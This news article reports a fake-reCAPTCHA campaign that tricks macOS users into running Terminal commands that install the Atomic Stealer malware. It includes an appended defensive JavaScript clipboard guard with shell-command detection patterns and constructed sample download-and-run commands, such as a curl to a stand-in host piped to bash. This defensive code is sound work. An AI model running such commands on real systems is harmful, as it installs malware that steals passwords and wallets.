
Image by Gabriela Gonzales, from Unsplash
Fake ReCAPTCHA Attack Installs MacOS Malware On Thousands Of Devices
A new malware campaign is targeting macOS users through fake reCAPTCHA popups, tricking them into installing powerful data-stealing software.
In a rush? Here are the quick facts:
- MacReaper targets macOS users through over 2,800 compromised websites.
- Victims are tricked via fake reCAPTCHA into running Terminal commands.
- Attack installs AMOS malware to steal passwords, crypto, and files.
A large-scale macOS malware operation is targeting thousands of websites to spread dangerous malware to Apple users, according to research by Bad Byte.
The MacReaper malware scheme tricks users through deceptive security alerts and uses blockchain functionality to steal passwords, credit card details, and cryptocurrency wallets.
When a macOS user visits one of the infected sites—such as a Brazilian news portal—they’re shown a fake reCAPTCHA window that asks them to click “I’m not a robot.” Once they do, a hidden script secretly copies a malicious command to the user’s clipboard.
The site then instructs the user to paste and run the command in Terminal. Doing so downloads and installs Atomic Stealer (AMOS), a piece of malware designed to extract a wide range of personal data.
AMOS gives attackers control of passwords stored in the macOS Keychain, browser data from Chrome and Firefox, cryptocurrency wallets, system information, and personal files. The attackers use Binance Smart Contracts, a blockchain technology, to hide their commands, making security tools ineffective at detecting or blocking the malware.
The scale of the attack is alarming. Bad Byte found more than 2,800 compromised websites across different sectors, including blogs, business sites, and news platforms. The researchers say that the majority of website owners remain unaware that their platforms serve as malware distribution channels.
To protect yourself, the researchers suggest not running Terminal commands from untrusted sources, particularly when prompted by a suspicious CAPTCHA.
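One defensive check for the clipboard step described above, as an added example that is not from the Bad Byte research or the original article: a page-side guard that refuses clipboard writes containing shell-command-like text. The pattern list, function names, and sample strings are assumptions constructed for illustration, not indicators from the campaign.

```javascript
// Heuristic patterns (assumed, not taken from the research): text that looks
// like a Terminal command rather than ordinary copied content.
const SHELL_HINTS = [
  { name: "downloader", re: /\b(curl|wget)\b/i },
  { name: "pipe-to-shell", re: /\|\s*(sudo\s+)?(ba|z)?sh\b/i },
  { name: "decode-and-run", re: /\bbase64\s+(-d|--decode)\b/i },
  { name: "osascript", re: /\bosascript\b/i },
  { name: "inline-exec", re: /\b(ba|z)?sh\s+-c\b/i },
];

// Constructed sample inputs (not real campaign commands).
const CONSTRUCTED_SAMPLES = {
  benign: "Order #4821 confirmed",
  download: "curl -fsSL https://example.invalid/verify | bash",
  encoded: "echo Y29uc3RydWN0ZWQ= | base64 -d | sh",
};

// Return which heuristics a candidate clipboard string trips.
function scoreClipboardText(text) {
  const hits = SHELL_HINTS.filter((h) => h.re.test(text)).map((h) => h.name);
  return { suspicious: hits.length > 0, hits };
}

// Wrap a clipboard-like object (e.g. navigator.clipboard) so that writes of
// command-like text are refused and passed to a reporting callback.
function guardClipboard(clipboard, report) {
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = async (text) => {
    const value = String(text);
    const verdict = scoreClipboardText(value);
    if (verdict.suspicious) {
      report({ text: value, hits: verdict.hits });
      throw new Error("clipboard write blocked: looks like a shell command");
    }
    return original(value);
  };
  return clipboard;
}
```

Site owners can install such a guard before third-party scripts load and send the reports to their logging endpoint. It does not cover the legacy `document.execCommand("copy")` path, and documentation pages with legitimate "copy command" buttons will trip it.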
This campaign highlights the growing sophistication of cyber threats against macOS users and serves as a stark reminder that Apple’s ecosystem is not immune to targeted attacks.